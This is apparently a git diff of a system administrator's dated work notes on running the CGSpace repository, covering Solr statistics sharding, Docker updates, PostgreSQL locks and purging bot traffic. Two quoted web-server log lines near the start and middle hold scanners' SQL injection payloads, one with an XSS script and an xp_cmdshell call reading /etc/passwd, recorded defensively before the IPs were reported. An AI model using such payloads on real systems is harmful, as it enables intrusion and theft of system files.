                                                                                                                                                                                                                                                                                                          45.9.20.71 - - [20/Oct/2021:02:31:15 +0200] "GET /bitstream/handle/10568/1820/Rhodesgrass.pdf?sequence=4&OoxD=6591%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 143070 "https://cgspace.cgiar.org:443/bitstream/handle/10568/1820/Rhodesgrass.pdf" "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11"
                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                          • I reported them to AbuseIPDB.com and purged their hits:
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                          $ ./ilri/check-spider-ip-hits.sh -f /tmp/ip.txt -p
                                                                                                                                                                                                                                                                                                          -Purging 6364 hits from 45.9.20.71 in statistics
                                                                                                                                                                                                                                                                                                          -Purging 8039 hits from 45.146.166.157 in statistics
                                                                                                                                                                                                                                                                                                          -Purging 3383 hits from 45.155.204.82 in statistics
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                          -Total number of bot hits purged: 17786
                                                                                                                                                                                                                                                                                                          -

                                                                                                                                                                                                                                                                                                          2021-10-31

                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                          $ ./ilri/check-spider-ip-hits.sh -f /tmp/ip.txt -p
                                                                                                                                                                                                                                                                                                          +Purging 6364 hits from 45.9.20.71 in statistics
                                                                                                                                                                                                                                                                                                          +Purging 8039 hits from 45.146.166.157 in statistics
                                                                                                                                                                                                                                                                                                          +Purging 3383 hits from 45.155.204.82 in statistics
                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                          +Total number of bot hits purged: 17786
                                                                                                                                                                                                                                                                                                          +

                                                                                                                                                                                                                                                                                                          2021-10-31

                                                                                                                                                                                                                                                                                                          • Update Docker containers for AReS on linode20 and run a fresh harvest
                                                                                                                                                                                                                                                                                                          • Found some strange IP (94.71.3.44) making 51,000 requests today with the user agent “Microsoft Internet Explorer” @@ -757,13 +757,13 @@ Purging 3383 hits from 45.155.204.82 in statistics
                                                                                                                                                                                                                                                                                                          • That’s from ASN 12552 (IPO-EU, SE), which is operated by Internet Vikings, though AbuseIPDB.com says it’s Availo Networks AB
                                                                                                                                                                                                                                                                                                          • There’s another IP (3.225.28.105) that made a few thousand requests to the REST API from Amazon, though it’s using a normal user agent
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                          # zgrep 3.225.28.105 /var/log/nginx/rest.log.* | wc -l
                                                                                                                                                                                                                                                                                                          -3991
                                                                                                                                                                                                                                                                                                          -~# zgrep 3.225.28.105 /var/log/nginx/rest.log.* | grep -oE 'GET /rest/(collections|handle|items)' | sort | uniq -c
                                                                                                                                                                                                                                                                                                          -   3154 GET /rest/collections
                                                                                                                                                                                                                                                                                                          -    427 GET /rest/handle
                                                                                                                                                                                                                                                                                                          -    410 GET /rest/items
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                            # zgrep 3.225.28.105 /var/log/nginx/rest.log.* | wc -l
                                                                                                                                                                                                                                                                                                            +3991
                                                                                                                                                                                                                                                                                                            +~# zgrep 3.225.28.105 /var/log/nginx/rest.log.* | grep -oE 'GET /rest/(collections|handle|items)' | sort | uniq -c
                                                                                                                                                                                                                                                                                                            +   3154 GET /rest/collections
                                                                                                                                                                                                                                                                                                            +    427 GET /rest/handle
                                                                                                                                                                                                                                                                                                            +    410 GET /rest/items
                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                            • It requested the CIAT Story Maps collection over 3,000 times last month…
                                                                                                                                                                                                                                                                                                              • I will purge those hits
                                                                                                                                                                                                                                                                                                              • diff --git a/docs/2021-11/index.html b/docs/2021-11/index.html index 65cf5f24b..dc6e14a7a 100644 --- a/docs/2021-11/index.html +++ b/docs/2021-11/index.html @@ -32,7 +32,7 @@ First I exported all the 2019 stats from CGSpace: $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid $ zstd statistics-2019.json "/> - + @@ -123,16 +123,16 @@ $ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                              • I experimented with manually sharding the Solr statistics on DSpace Test
                                                                                                                                                                                                                                                                                                              • First I exported all the 2019 stats from CGSpace:
                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                              $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                              -$ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                +$ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                $ mkdir -p /home/dspacetest.cgiar.org/solr/statistics-2019/data
                                                                                                                                                                                                                                                                                                                -# create core in Solr admin
                                                                                                                                                                                                                                                                                                                -$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2019-*</query></delete>"
                                                                                                                                                                                                                                                                                                                -$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                  $ mkdir -p /home/dspacetest.cgiar.org/solr/statistics-2019/data
                                                                                                                                                                                                                                                                                                                  +# create core in Solr admin
                                                                                                                                                                                                                                                                                                                  +$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2019-*</query></delete>"
                                                                                                                                                                                                                                                                                                                  +$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                  • The key thing above is that you create the core in the Solr admin UI, but the data directory must already exist so you have to do that first in the file system
                                                                                                                                                                                                                                                                                                                  • I restarted the server after the import was done to see if the cores would come back up OK
                                                                                                                                                                                                                                                                                                                      @@ -165,13 +165,13 @@ $ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics
                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                  91.213.50.11 - - [03/Nov/2021:06:47:20 +0100] "HEAD /bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf?sequence=1%60%20WHERE%206158%3D6158%20AND%204894%3D4741--%20kIlq&isAllowed=y HTTP/1.1" 200 0 "https://cgspace.cgiar.org:443/bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf" "Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10"
                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                    91.213.50.11 - - [03/Nov/2021:06:47:20 +0100] "HEAD /bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf?sequence=1%60%20WHERE%206158%3D6158%20AND%204894%3D4741--%20kIlq&isAllowed=y HTTP/1.1" 200 0 "https://cgspace.cgiar.org:443/bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf" "Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10"
                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                    • Another is in China, and they grabbed 1,200 PDFs from the REST API in under an hour:
                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                    # zgrep 222.129.53.160 /var/log/nginx/rest.log.2.gz | wc -l
                                                                                                                                                                                                                                                                                                                    -1178
                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                      # zgrep 222.129.53.160 /var/log/nginx/rest.log.2.gz | wc -l
                                                                                                                                                                                                                                                                                                                      +1178
                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                      • I will continue to split the Solr statistics back into year-shards on DSpace Test (linode26)
                                                                                                                                                                                                                                                                                                                        • Today I did all 2018 stats…
                                                                                                                                                                                                                                                                                                                        • @@ -183,9 +183,9 @@ $ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics
                                                                                                                                                                                                                                                                                                                          • Update all Docker containers on AReS and rebuild OpenRXV:
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                          $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                          -$ docker-compose build
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                            +$ docker-compose build
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            • Then restart the server and start a fresh harvest
                                                                                                                                                                                                                                                                                                                            • Continue splitting the Solr statistics into yearly shards on DSpace Test (doing 2017, 2016, 2015, and 2014 today)
                                                                                                                                                                                                                                                                                                                            • Several users wrote to me last week to say that workflow emails haven’t been working since 2021-10-21 or so @@ -194,33 +194,33 @@ $ docker-compose build
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                          $ dspace test-email
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                          -About to send test email:
                                                                                                                                                                                                                                                                                                                          - - To: fuuuu
                                                                                                                                                                                                                                                                                                                          - - Subject: DSpace test email
                                                                                                                                                                                                                                                                                                                          - - Server: smtp.office365.com
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                          -Error sending email:
                                                                                                                                                                                                                                                                                                                          - - Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 535 5.7.139 Authentication unsuccessful, the user credentials were incorrect. [AM5PR0701CA0005.eurprd07.prod.outlook.com]
                                                                                                                                                                                                                                                                                                                          -)
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                          -Please see the DSpace documentation for assistance.
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            $ dspace test-email
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            +About to send test email:
                                                                                                                                                                                                                                                                                                                            + - To: fuuuu
                                                                                                                                                                                                                                                                                                                            + - Subject: DSpace test email
                                                                                                                                                                                                                                                                                                                            + - Server: smtp.office365.com
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            +Error sending email:
                                                                                                                                                                                                                                                                                                                            + - Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 535 5.7.139 Authentication unsuccessful, the user credentials were incorrect. [AM5PR0701CA0005.eurprd07.prod.outlook.com]
                                                                                                                                                                                                                                                                                                                            +)
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            +Please see the DSpace documentation for assistance.
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            • I sent a message to ILRI ICT to ask them to check the account/password
                                                                                                                                                                                                                                                                                                                            • I want to do one last test of the Elasticsearch updates on OpenRXV so I got a snapshot of the latest Elasticsearch volume used on the production AReS instance:
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                            # tar czf openrxv_esData_7.tar.xz /var/lib/docker/volumes/openrxv_esData_7
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              # tar czf openrxv_esData_7.tar.xz /var/lib/docker/volumes/openrxv_esData_7
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              • Then on my local server:
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                              $ mv ~/.local/share/containers/storage/volumes/openrxv_esData_7/ ~/.local/share/containers/storage/volumes/openrxv_esData_7.2021-11-07.bak
                                                                                                                                                                                                                                                                                                                              -$ tar xf /tmp/openrxv_esData_7.tar.xz -C ~/.local/share/containers/storage/volumes --strip-components=4
                                                                                                                                                                                                                                                                                                                              -$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type f -exec chmod 660 {} \;
                                                                                                                                                                                                                                                                                                                              -$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type d -exec chmod 770 {} \;
                                                                                                                                                                                                                                                                                                                              -# copy backend/data to /tmp for the repository setup/layout
                                                                                                                                                                                                                                                                                                                              -$ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/data
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                $ mv ~/.local/share/containers/storage/volumes/openrxv_esData_7/ ~/.local/share/containers/storage/volumes/openrxv_esData_7.2021-11-07.bak
                                                                                                                                                                                                                                                                                                                                +$ tar xf /tmp/openrxv_esData_7.tar.xz -C ~/.local/share/containers/storage/volumes --strip-components=4
                                                                                                                                                                                                                                                                                                                                +$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type f -exec chmod 660 {} \;
                                                                                                                                                                                                                                                                                                                                +$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type d -exec chmod 770 {} \;
                                                                                                                                                                                                                                                                                                                                +# copy backend/data to /tmp for the repository setup/layout
                                                                                                                                                                                                                                                                                                                                +$ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/data
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                • This seems to work: all items, stats, and repository setup/layout are OK
                                                                                                                                                                                                                                                                                                                                • I merged my Elasticsearch pull request from last month into OpenRXV
                                                                                                                                                                                                                                                                                                                                @@ -245,21 +245,21 @@ $ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/d
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                            RuntimeError
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                            -Unable to find installation candidates for regex (2021.11.9)
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                            -at /usr/lib/python3.9/site-packages/poetry/installation/chooser.py:72 in choose_for
                                                                                                                                                                                                                                                                                                                            -     68│
                                                                                                                                                                                                                                                                                                                            -     69│             links.append(link)
                                                                                                                                                                                                                                                                                                                            -     70│
                                                                                                                                                                                                                                                                                                                            -     71│         if not links:
                                                                                                                                                                                                                                                                                                                            -  →  72│             raise RuntimeError(
                                                                                                                                                                                                                                                                                                                            -     73│                 "Unable to find installation candidates for {}".format(package)
                                                                                                                                                                                                                                                                                                                            -     74│             )
                                                                                                                                                                                                                                                                                                                            -     75│
                                                                                                                                                                                                                                                                                                                            -     76│         # Get the best link
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              RuntimeError
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              +Unable to find installation candidates for regex (2021.11.9)
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              +at /usr/lib/python3.9/site-packages/poetry/installation/chooser.py:72 in choose_for
                                                                                                                                                                                                                                                                                                                              +     68│
                                                                                                                                                                                                                                                                                                                              +     69│             links.append(link)
                                                                                                                                                                                                                                                                                                                              +     70│
                                                                                                                                                                                                                                                                                                                              +     71│         if not links:
                                                                                                                                                                                                                                                                                                                              +  →  72│             raise RuntimeError(
                                                                                                                                                                                                                                                                                                                              +     73│                 "Unable to find installation candidates for {}".format(package)
                                                                                                                                                                                                                                                                                                                              +     74│             )
                                                                                                                                                                                                                                                                                                                              +     75│
                                                                                                                                                                                                                                                                                                                              +     76│         # Get the best link
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              • So that’s super annoying… I’m going to try using Pipenv again…

                                                                                                                                                                                                                                                                                                                              2021-11-10

                                                                                                                                                                                                                                                                                                                              @@ -280,16 +280,16 @@ $ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/d
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                          $ docker-compose down
                                                                                                                                                                                                                                                                                                                          -$ sudo tar czf openrxv_esData_7-2021-11-14.tar.xz /var/lib/docker/volumes/openrxv_esData_7
                                                                                                                                                                                                                                                                                                                          -$ cp -a backend/data backend/data.2021-11-14
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            $ docker-compose down
                                                                                                                                                                                                                                                                                                                            +$ sudo tar czf openrxv_esData_7-2021-11-14.tar.xz /var/lib/docker/volumes/openrxv_esData_7
                                                                                                                                                                                                                                                                                                                            +$ cp -a backend/data backend/data.2021-11-14
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            • Then I checked out the latest git commit, updated all images, rebuilt the project:
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                            $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                            -$ docker-compose build
                                                                                                                                                                                                                                                                                                                            -$ docker-compose up -d
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                              +$ docker-compose build
                                                                                                                                                                                                                                                                                                                              +$ docker-compose up -d
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              • Then I updated the repository configurations and started a fresh harvest
                                                                                                                                                                                                                                                                                                                              • Help Francesca from the Alliance with a question about embargos on CGSpace items
                                                                                                                                                                                                                                                                                                                                  @@ -315,11 +315,11 @@ $ docker-compose up -d
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                              $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
                                                                                                                                                                                                                                                                                                                              -Purging 10893 hits from 87.203.87.141 in statistics
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                              -Total number of bot hits purged: 10893
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
                                                                                                                                                                                                                                                                                                                                +Purging 10893 hits from 87.203.87.141 in statistics
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +Total number of bot hits purged: 10893
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                • I did a bit more work documenting and tweaking the PostgreSQL configuration for CGSpace and DSpace Test in the Ansible infrastructure playbooks
                                                                                                                                                                                                                                                                                                                                  • I finally deployed the changes on both servers
                                                                                                                                                                                                                                                                                                                                  • @@ -344,8 +344,8 @@ Purging 10893 hits from 87.203.87.141 in statistics
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                $ vipsthumbnail AR\ RTB\ 2020.pdf -s 600 -o '%s.jpg[Q=85,optimize_coding,strip]'
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  $ vipsthumbnail AR\ RTB\ 2020.pdf -s 600 -o '%s.jpg[Q=85,optimize_coding,strip]'
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  • I sent an email to the OpenArchives.org contact to ask for help with the OAI validator
                                                                                                                                                                                                                                                                                                                                    • Someone responded to say that there have been a number of complaints about this on the oai-pmh mailing list recently…
                                                                                                                                                                                                                                                                                                                                    • @@ -365,20 +365,20 @@ Purging 10893 hits from 87.203.87.141 in statistics
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                  $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt
                                                                                                                                                                                                                                                                                                                                  -Found 8352 hits from 138.201.49.199 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 9374 hits from 78.46.89.18 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 2112 hits from 93.179.69.74 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 1 hits from 31.6.77.23 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 5 hits from 34.209.213.122 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 86772 hits from 163.172.68.99 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 77 hits from 163.172.70.248 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 15842 hits from 163.172.71.24 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 172954 hits from 104.154.216.0 in statistics
                                                                                                                                                                                                                                                                                                                                  -Found 3 hits from 188.134.31.88 in statistics
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                  -Total number of hits from bots: 295492
                                                                                                                                                                                                                                                                                                                                  -

                                                                                                                                                                                                                                                                                                                                  2021-11-27

                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt
                                                                                                                                                                                                                                                                                                                                  +Found 8352 hits from 138.201.49.199 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 9374 hits from 78.46.89.18 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 2112 hits from 93.179.69.74 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 1 hits from 31.6.77.23 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 5 hits from 34.209.213.122 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 86772 hits from 163.172.68.99 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 77 hits from 163.172.70.248 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 15842 hits from 163.172.71.24 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 172954 hits from 104.154.216.0 in statistics
                                                                                                                                                                                                                                                                                                                                  +Found 3 hits from 188.134.31.88 in statistics
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  +Total number of hits from bots: 295492
                                                                                                                                                                                                                                                                                                                                  +

                                                                                                                                                                                                                                                                                                                                  2021-11-27

                                                                                                                                                                                                                                                                                                                                  • Peter sent me corrections for the authors that I had sent him back in 2021-09
                                                                                                                                                                                                                                                                                                                                      @@ -387,16 +387,16 @@ Found 3 hits from 188.134.31.88 in statistics
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                  $ ./ilri/fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                    $ ./ilri/fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                    • Then I imported to CGSpace and started a full Discovery re-index:
                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                    $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                    -real    272m43.818s
                                                                                                                                                                                                                                                                                                                                    -user    183m4.543s
                                                                                                                                                                                                                                                                                                                                    -sys     2m47.988
                                                                                                                                                                                                                                                                                                                                    -

                                                                                                                                                                                                                                                                                                                                    2021-11-28

                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                    $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                    +real    272m43.818s
                                                                                                                                                                                                                                                                                                                                    +user    183m4.543s
                                                                                                                                                                                                                                                                                                                                    +sys     2m47.988
                                                                                                                                                                                                                                                                                                                                    +

                                                                                                                                                                                                                                                                                                                                    2021-11-28

                                                                                                                                                                                                                                                                                                                                    • Run system updates on AReS server (linode20) and update all Docker containers and reboot
                                                                                                                                                                                                                                                                                                                                        @@ -405,12 +405,12 @@ sys 2m47.988
                                                                                                                                                                                                                                                                                                                                      • I am experimenting with pinning npm version 7 on OpenRXV frontend because of these Angular errors:
                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                      npm WARN EBADENGINE Unsupported engine {
                                                                                                                                                                                                                                                                                                                                      -npm WARN EBADENGINE   package: '@angular-devkit/architect@0.901.15',
                                                                                                                                                                                                                                                                                                                                      -npm WARN EBADENGINE   required: { node: '>= 10.13.0', npm: '^6.11.0 || ^7.5.6', yarn: '>= 1.13.0' },
                                                                                                                                                                                                                                                                                                                                      -npm WARN EBADENGINE   current: { node: 'v12.22.7', npm: '8.1.3' }
                                                                                                                                                                                                                                                                                                                                      -npm WARN EBADENGINE }
                                                                                                                                                                                                                                                                                                                                      -

                                                                                                                                                                                                                                                                                                                                      2021-11-29

                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                      npm WARN EBADENGINE Unsupported engine {
                                                                                                                                                                                                                                                                                                                                      +npm WARN EBADENGINE   package: '@angular-devkit/architect@0.901.15',
                                                                                                                                                                                                                                                                                                                                      +npm WARN EBADENGINE   required: { node: '>= 10.13.0', npm: '^6.11.0 || ^7.5.6', yarn: '>= 1.13.0' },
                                                                                                                                                                                                                                                                                                                                      +npm WARN EBADENGINE   current: { node: 'v12.22.7', npm: '8.1.3' }
                                                                                                                                                                                                                                                                                                                                      +npm WARN EBADENGINE }
                                                                                                                                                                                                                                                                                                                                      +

                                                                                                                                                                                                                                                                                                                                      2021-11-29

                                                                                                                                                                                                                                                                                                                                      • Tezira reached out to me to say that submissions on CGSpace are taking forever
                                                                                                                                                                                                                                                                                                                                      • I see a definite increase in locks in the last few days:
                                                                                                                                                                                                                                                                                                                                      • @@ -419,24 +419,24 @@ npm WARN EBADENGINE }
                                                                                                                                                                                                                                                                                                                                        • The locks are all held by dspaceWeb (XMLUI):
                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                        $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                        -      1 
                                                                                                                                                                                                                                                                                                                                        -      1 ------------------
                                                                                                                                                                                                                                                                                                                                        -      1 (1394 rows)
                                                                                                                                                                                                                                                                                                                                        -      1  application_name 
                                                                                                                                                                                                                                                                                                                                        -      9  psql
                                                                                                                                                                                                                                                                                                                                        -   1385  dspaceWeb
                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                          $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                          +      1 
                                                                                                                                                                                                                                                                                                                                          +      1 ------------------
                                                                                                                                                                                                                                                                                                                                          +      1 (1394 rows)
                                                                                                                                                                                                                                                                                                                                          +      1  application_name 
                                                                                                                                                                                                                                                                                                                                          +      9  psql
                                                                                                                                                                                                                                                                                                                                          +   1385  dspaceWeb
                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                          • I restarted PostgreSQL and the locks dropped down:
                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                          $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                          -      1
                                                                                                                                                                                                                                                                                                                                          -      1 ------------------
                                                                                                                                                                                                                                                                                                                                          -      1 (103 rows)
                                                                                                                                                                                                                                                                                                                                          -      1  application_name
                                                                                                                                                                                                                                                                                                                                          -      9  psql
                                                                                                                                                                                                                                                                                                                                          -     94  dspaceWeb
                                                                                                                                                                                                                                                                                                                                          -

                                                                                                                                                                                                                                                                                                                                          2021-11-30

                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                          $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                          +      1
                                                                                                                                                                                                                                                                                                                                          +      1 ------------------
